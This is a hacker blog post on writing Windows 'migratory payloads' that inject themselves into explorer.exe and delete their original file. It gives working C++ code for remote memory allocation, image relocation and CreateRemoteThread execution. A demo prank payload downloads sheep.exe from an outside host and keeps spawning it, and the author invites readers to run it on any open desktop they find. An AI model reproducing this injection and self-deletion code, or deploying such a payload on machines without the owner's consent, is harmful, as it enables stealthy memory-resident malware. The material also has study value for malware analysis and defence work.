Writing Migratory Payloads
Hi. I’m procrastinating again, but this time it’s related to the project I’m procrastinating. And according to a well respected hacker, this is a functional way to be productive. So you, the reader, benefit from everything. Besides, the deadline for the Phrack CFP isn’t for another few months, so I’ve got time. (Famous last words.)
First of all, what the hell do I mean by migratory payload? That’s not a term in
MITRE ATT&CK! In more technical terms, when I say “migratory payload,”
I am referring to executables that can otherwise occupy the space of another executable after existing
and operating in another state. Think of an executable that runs away from your mouse and injects
itself into explorer.exe
after you double-click it. It relies ultimately on
process injection, which is a slightly different but similar
technique to DLL injection. MITRE can be fun to rag on
but they host a useful technical compendium.
So why did I make up the term “migratory payload,” and what does it do? It sounds neat and it does what it says on the tin: migrates from executable to executable via whatever method of memory injection deemed necessary. Here’s an executive summary of what a migratory payload would do:
- Start (as you do)
- Allocate memory in another process
- Write executable to allocated memory
- Spawn thread that loads and runs the executable image in the target process
- Delete original process
- Party in the target executable
But is this just a party trick? Kind of, but it’s useful– once you’re in the memory of a trusted process
like explorer.exe
it can be difficult to extract you without being aware explorer.exe
is infected. Interestingly, there’s
honestly not a lot to writing a migratory payload– there’s just a lot of moving pieces to be aware of to effectively write up
the program.
Let’s talk about how to write an effective payload of this variety!
Don’t Sweat the Techniques
I have practically spammed this article
I wrote talking about how to load a PE file manually. You’re gonna wanna read it again if you’re not familiar with the process
already– we need it to load our PE file once it’s injected into the target process. Depending on which process we’re migrating
to, we might want a different function to call to load our binary. Despite being remote to the target process, we don’t need
to rely on __declspec(dllexport)
entries to call target functions! We can simply calculate the RVA of the function we wish to
call to get the address of the function as it exists in the remote process and call CreateRemoteThread
.
If you’re familiar with how modern programs in MSVC compile down to code, you know about the C runtime. If you’re not familiar, the C
and C++ runtime are the boilerplate code that gets included in your program which defines the functionality of the various entrypoints
within the Windows code. It is what drives the functionality behind the difference between main
and WinMain
. It’s the reason for
the separate /MD
and /MT
compiler switches. Because /MD
requires a build-specific MSVC DLL for the resulting binary and /MT
requires
runtime resolution prior to the call to main
regardless if it’s a DLL or EXE entrypoint, we need to be aware of this when initializing
our binary in another process. You might be tempted to say fuck it and issue the /NODEFAULTLIB
command switch for maximum flexibility,
which ultimately wipes out the C runtime preamble, but unless you’re prepared for the painful hell that is lacking a C runtime, you don’t
want to do that.
Let’s talk about entrypoints for a second. Depending on whether your binary is configured to be a DLL or an EXE, you get wildly different entrypoints. For DLLs, you have the following entrypoint:
BOOL WINAPI DllMain(HINSTANCE dll_instance, DWORD reason, LPVOID reserved)
This is not just the C runtime entrypoint either– when a file is loaded by the Windows loader as a DLL, AddressOfEntryPoint
has that header.
For executables, though, the entrypoint isn’t like the C runtime entrypoint for main
at all. The executable entrypoint, we’ll call it start
,
is very simple:
int start(void)
This is from the deep lore that is the Windows loader.
Because a DLL by design separates functions (exports) from loaders (DllMain
), it is clearly the superior configuration for this sort of setup,
due to needing to deal with the C runtime preamble in some way or another. This is why DLL injection reigns supreme– it is an easily shimmable
piece of code which has clearly delineated functionality versus loading. But DLLs are hard to deploy functionally without some sort of corresponding
executable piece. A DLL needs a trigger after all. So let’s make an executable with a multipurpose main
routine!
The main
routine for the C runtime comes with a quirk: when you return from main
, ExitProcess
is eventually called. This is problematic if we’re
going to invade the space of a permanently-running executable like explorer.exe
with CreateRemoteThread
! We can create an atexit
routine that,
instead of calling ExitProcess
, calls ExitThread
(documentation
here). And since we have control over the
allocated memory of the module when it migrates to another executable’s space, we can use arbitrary thread functions to instrument the pre-load
state of the binary as it migrates.
The superiority of the DLL approach also rears its ugly head here– we need a fresh image to inject into our target program! Interestingly, however,
it’s also its Achilles’ heel– what makes the DLL superior is that it can rapidly launch from disk into a target process with easily supported mechanisms
like LoadLibraryA
coupled with CreateRemoteThread
. See, the DLL is being converted from a disk image to a memory image, and it achieves this by
existing on disk to begin with. What if, when we stopped existing on disk, and we’ve infested another process, we wanted to infest another process?
Well, we would need to preserve the image in its pre-load state, which is typically its disk image state. Since the goal here is to exist outside the
system’s disk as much as possible, we can be rather fluid as to what we want the prior state to be in, but we’ll be lazy and just stick with the disk
image as a base state for now.
That’s a lot of fucking words without a break and I’m sorry, but I’m trying to set the scene here. Let’s break down what we need as a base state for the migratory payload:
- a
main
routine with some sort of multi-entrant state (since we’re calling it for the C runtime) - the migration fork in the
main
routine which setsExitThread
atexit
hooks - a loader thread which loads the image and sets the target state
- a fresh copy of the memory image prior to the calling of the entrypoint for fresh migration
That’s enough theory, let’s let the rubber hit the pavement and get an implementation going.
Applying the Techniques
First of all, fuck main
for this purpose. main
in the C runtime triggers spawning a console window. Do you really want to spawn a
new console window with every infection? “Maybe I want to debug it,” you might be thinking. Sure, if that’s your style of debugging,
I’m not going to knock it. I’m not going to throw stones– printf
debugging is an age-old technique and I’m guilty of it sometimes too.
No, we want good old WinMain
for this, documentation here.
int WinMain(HINSTANCE instance, HINSTANCE prev_instance, LPSTR command_line, int show_command)
Secondly, we want a fresh image for migration purposes! How do we get that? Our executable is at its freshest just before the first entrypoint,
which is not WinMain
but a TLS callback. So we create a TLS callback which parses our executable’s PE header to get the size of the image
and copy a fresh image for later manipulation.
VOID WINAPI get_fresh_image(PVOID instance, DWORD reason, PVOID reserved) {
if (reason != DLL_PROCESS_ATTACH)
return;
std::uint8_t *self_u8 = (std::uint8_t *)instance;
PIMAGE_NT_HEADERS64 nt_headers = get_nt_headers(self_u8);
FRESH_IMAGE = (std::uint8_t *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nt_headers->OptionalHeader.SizeOfImage);
std::memcpy(FRESH_IMAGE, self_u8, nt_headers->OptionalHeader.SizeOfImage);
}
#pragma comment(linker, "/INCLUDE:_tls_used")
#pragma comment(linker, "/INCLUDE:tls_callback")
#pragma const_seg(push)
#pragma const_seg(".CRT$XLAAA")
extern "C" const PIMAGE_TLS_CALLBACK tls_callback = get_fresh_image;
#pragma const_seg(pop)
We specifically call HeapAlloc
and not std::malloc
because std::malloc
requires the C runtime to be initialized, which occurs when
the main entrypoint is called, and our TLS callback is specifically intended to be run before that. If you really wanted to, you could call
VirtualAlloc
but since the image is going to be externally executed in a remote buffer it seems a little overkill.
Because we might want our loader to rely on data and code relocated by the relocation directory, we separate relocating the binary from the loader, and perform the relocation on the binary before it’s written to the process space of the target binary we want to migrate to.
You might also be painfully aware of another bottleneck: a single argument being passed to our loader and other target functions, since we’re
relying on CreateRemoteThread
. The worst part is that we can’t successfully pass anything that relies on pointers via CreateRemoteThread
–
we would need to deep copy and transfer the data we need via VirtualAllocEx
and WriteProcessMemory
to the target process, then pass that
pointer to CreateRemoteThread
as the thread’s argument. Clunky, but it works.
Spamming you with this how-to again, because now’s the time
in the article where we talk about writing the loader. On top of needing to prepare the image for execution as if we’re calling LoadLibrary
,
we need to alter the new main state of the migrated binary so that our WinMain
routine changes routes. Once we’ve changed the state with the
loader routine, we can write our configuration data to the process and re-execute WinMain
with our altered state.
Now it’s time to use the loader. We need to open our target process for manipulation and injection. Once we’ve found our target process– I have chosen to call
EnumProcesses
to find explorer.exe
– we can attempt to acquire a process handle in the following way.
/* open pid with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE */
HANDLE explorer_proc = OpenProcess(PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, found_pid);
assert(explorer_proc != nullptr);
From here, we can create a copy of our fresh image and write it into our target process’s memory space.
/* allocate space for our executable */
std::uint8_t *self_u8 = (std::uint8_t *)GetModuleHandleA(nullptr);
PIMAGE_NT_HEADERS64 self_nt = get_nt_headers(self_u8);
std::uintptr_t explorer_base = (std::uintptr_t)VirtualAllocEx(explorer_proc, nullptr, self_nt->OptionalHeader.SizeOfImage, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
assert(explorer_base != 0);
/* copy the executable in memory and relocate it to the allocated base */
std::uint8_t *copy_u8 = (std::uint8_t *)std::malloc(self_nt->OptionalHeader.SizeOfImage);
std::memcpy(copy_u8, FRESH_IMAGE, self_nt->OptionalHeader.SizeOfImage);
relocate_image(copy_u8, (std::uintptr_t)self_u8, explorer_base);
/* write the relocated executable to the process's allocation with WriteProcessMemory */
SIZE_T bytes_written;
assert(WriteProcessMemory(explorer_proc, (LPVOID)explorer_base, copy_u8, self_nt->OptionalHeader.SizeOfImage, &bytes_written));
We then create the configuration needed for our migrated binary, copy it into the memory of our target executable, then create a thread for our loader via calculating our loader function’s RVA and executing it with the configuration pointer.
std::uintptr_t config_base = (std::uintptr_t)VirtualAllocEx(explorer_proc, nullptr, sizeof(SheepConfig), MEM_COMMIT, PAGE_READWRITE);
assert(config_base != 0);
SheepConfig explorer_config;
std::memset(&explorer_config, 0, sizeof(SheepConfig));
explorer_config.image_base = explorer_base;
explorer_config.state = MonitorState::STATE_MONITOR;
explorer_config.launcher_pid = GetCurrentProcessId();
explorer_config.max_sheep = 10;
GetModuleFileName(nullptr, &explorer_config.launcher_file[0], MAX_PATH);
assert(WriteProcessMemory(explorer_proc, (LPVOID)config_base, &explorer_config, sizeof(SheepConfig), &bytes_written));
/* get the rva of the loader and call it with CreateRemoteThread */
DWORD loader_rva = VA_TO_RVA(self_u8, load_image);
DWORD loader_id;
HANDLE loader_handle = CreateRemoteThread(explorer_proc, nullptr, 8192, (LPTHREAD_START_ROUTINE)(explorer_base+loader_rva), (LPVOID)config_base, 0, &loader_id);
assert(loader_handle != nullptr);
/* wait for the thread to finish */
WaitForSingleObject(loader_handle, INFINITE);
Finally, all that’s left to do is re-execute WinMain
in the target process.
/* get the rva of the target routine and call it with CreateRemoteThread */
DWORD main_id;
HANDLE main_handle = CreateRemoteThread(explorer_proc, nullptr, 8192, (LPTHREAD_START_ROUTINE)(explorer_base+self_nt->OptionalHeader.AddressOfEntryPoint), nullptr, 0, &main_id);
assert(main_handle != nullptr);
Demo Payload: Sheep Monitor
Let’s talk about the demo payload for a moment. I am a particular fan of the classic eSheep program and if you’ve been paying attention you’ve noticed me using it a lot in the preceding blogs. This demo payload is no different. One of the things I wanted this demo payload to do was demonstrate being aggressively memory-resident, and recreating the classic “delete yourself” technique in this part of the payload. So in the opening routine of our payload, we have the following code.
case MonitorState::STATE_MONITOR: {
atexit(exit_thread);
DWORD exit_code = STILL_ACTIVE;
do {
HANDLE proc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, GLOBAL_CONFIG->launcher_pid);
// if it results in a null handle, the process is probably dead
if (proc == nullptr)
break;
GetExitCodeProcess(proc, &exit_code);
Sleep(1000);
} while (exit_code == STILL_ACTIVE);
Here, we open the original launcher process ID and sit on it until it stops running. Then, we wait until the file is deleted from disk before continuing.
/* we could get fancy and persist in the registry if we so wanted to right here,
* but for demo purposes we simply delete the original file */
while (!DeleteFile(GLOBAL_CONFIG->launcher_file)) {
DWORD error = GetLastError();
if (error == ERROR_FILE_NOT_FOUND)
break;
Sleep(1000);
}
We are now ready to enter our main process loop. Functionally, it’s pretty simple.
- Create a pool of processes
- If the sheep program isn’t present, download it
- If the pool isn’t at the limit, spawn a new sheep while clearing inactive sheep
- If the pool is full, every sheep plays Russian Roulette to thin out the herd
- Sleep for 60 seconds and do it all again
std::vector<PROCESS_INFORMATION> sheep_pool;
while (GetFileAttributes("C:\\ProgramData\\sheep.exe") != INVALID_FILE_ATTRIBUTES || download_url(L"amethyst.systems", L"/sheep.exe", "C:\\ProgramData\\sheep.exe")) {
if (sheep_pool.size() > 0)
while (clear_inactive_sheep(sheep_pool));
if (sheep_pool.size() < GLOBAL_CONFIG->max_sheep) {
PROCESS_INFORMATION new_sheep;
if (spawn_sheep(&new_sheep))
sheep_pool.push_back(new_sheep);
}
else
russian_roulette(sheep_pool);
Sleep(60000);
}
This payload could be considered functional prankware. Feel free to run it on any open desktop you find! It’s memory-resident and disappears either when explorer.exe
crashes (though not as a result of us) or when the user reboots.
Merry Christmas and happy hacking!